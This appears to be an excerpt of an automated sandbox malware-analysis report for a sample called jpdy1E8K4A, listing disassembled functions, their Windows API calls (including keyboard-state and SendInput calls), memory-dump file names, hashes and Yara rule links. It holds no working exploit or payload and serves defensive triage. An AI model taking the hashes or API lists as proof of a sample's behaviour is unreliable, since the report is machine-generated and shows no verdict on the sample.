                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 1957940570-0
                                                                                                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                • String ID:
                                                                                                • API String ID: 259663610-0
                                                                                                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                • String ID:
                                                                                                • API String ID: 3220332590-0
                                                                                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 1612042205-0
                                                                                                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                                                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                                                Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove_strncmp
                                                                                                • String ID: >$U$\
                                                                                                • API String ID: 2666721431-237099441
                                                                                                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                                                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                                                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                                                Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$KeyboardState$InputSend
                                                                                                • String ID:
                                                                                                • API String ID: 2221674350-0
                                                                                                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                • String ID:
                                                                                                • API String ID: 2037614760-0
                                                                                                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                                                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                                                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                                                Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                • String ID:
                                                                                                • API String ID: 960795272-0
                                                                                                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                • String ID:
                                                                                                • API String ID: 4189319755-0
                                                                                                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                • String ID:
                                                                                                • API String ID: 1976402638-0
                                                                                                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 642888154-0
                                                                                                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Copy$ClearErrorLast
                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                • API String ID: 2487901850-572801152
                                                                                                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Enable$Show$MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 1871949834-0
                                                                                                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
